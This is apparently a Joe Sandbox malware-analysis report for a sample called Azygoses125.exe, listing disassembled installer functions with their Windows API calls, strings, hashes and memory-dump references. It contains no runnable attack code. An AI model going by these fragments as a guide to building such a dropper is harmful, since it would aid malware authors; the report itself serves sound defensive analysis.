Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58

Function 004046E2 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404731
SetWindowTextW.USER32(00000000,?), ref: 0040475B
SHBrowseForFolderW.SHELL32(?), ref: 0040480C
CoTaskMemFree.OLE32(00000000), ref: 00404817
lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404849
lstrcatW.KERNEL32(?,: Completed), ref: 00404855
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867

Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF

Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\Azygoses125.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040647A
Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\Azygoses125.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040648E
Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 004064A1

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945

Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00404832
A, xrefs: 00404805
H7B, xrefs: 004047DF
: Completed, xrefs: 00404843, 00404848, 00404853

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\magmaet\clenched$H7B
API String ID: 2624150263-3880493371
Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69

Function 004043E4 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
GetDlgItem.USER32(?,000003E8), ref: 00404496
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
GetSysColor.USER32(?), ref: 004044C4
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
lstrlenW.KERNEL32(?), ref: 004044E5
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
GetDlgItem.USER32(?,0000040A), ref: 00404560
SendMessageW.USER32(00000000), ref: 00404567
GetDlgItem.USER32(?,000003E8), ref: 00404592
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
SetCursor.USER32(00000000), ref: 004045E6
ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
LoadCursorW.USER32(00000000,00007F00), ref: 00404607
SetCursor.USER32(00000000), ref: 0040460A
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B

Strings

N, xrefs: 00404580
[C@, xrefs: 004045F0
: Completed, xrefs: 004045C1
open, xrefs: 004045F3

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$N$[C@$open
API String ID: 3615053054-3308546834
Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9

Function 00405EB2 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE

Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF

GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
wsprintfA.USER32 ref: 00405F29
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
GlobalFree.KERNEL32(00000000), ref: 00406012
CloseHandle.KERNEL32(00000000), ref: 00406019

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Azygoses125.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Strings

uB, xrefs: 00405F07
NUL, xrefs: 00405EBB
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405EB2
uB, xrefs: 00405F00
[Rename], xrefs: 00405F93, 00405FA5
%ls=%ls, xrefs: 00405F1F
mB, xrefs: 00405EB6

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
API String ID: 222337774-3510403337
Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4

Function 00406417 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\Azygoses125.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040647A
CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
CharNextW.USER32(0040A230,"C:\Users\user\Desktop\Azygoses125.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040648E
CharPrevW.USER32(0040A230,0040A230,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 004064A1

Strings

"C:\Users\user\Desktop\Azygoses125.exe", xrefs: 0040645B
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406418
*?|<>/":, xrefs: 00406469

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Azygoses125.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-2218666925
Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD

Function 004042AE Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042CB
GetSysColor.USER32(00000000), ref: 004042E7
SetTextColor.GDI32(?,00000000), ref: 004042F3
SetBkMode.GDI32(?,?), ref: 004042FF
GetSysColor.USER32(?), ref: 00404312
SetBkColor.GDI32(?,?), ref: 00404322
DeleteObject.GDI32(?), ref: 0040433C
CreateBrushIndirect.GDI32(?), ref: 00404346

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69

Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
GetTickCount.KERNEL32 ref: 00402DD8
wsprintfW.USER32 ref: 00402E06

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
ShowWindow.USER32(00000000,00000005), ref: 00402E38

Part of subcall function 00402D83: MulDiv.KERNEL32(004DB86C,00000064,004DA57C), ref: 00402D98

Strings

... %d%%, xrefs: 00402E00

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
Opcode Fuzzy Hash: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE

Function 00404BAC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
GetMessagePos.USER32 ref: 00404BCF
ScreenToClient.USER32(?,?), ref: 00404BE9
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21

Strings

f, xrefs: 00404BFD

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
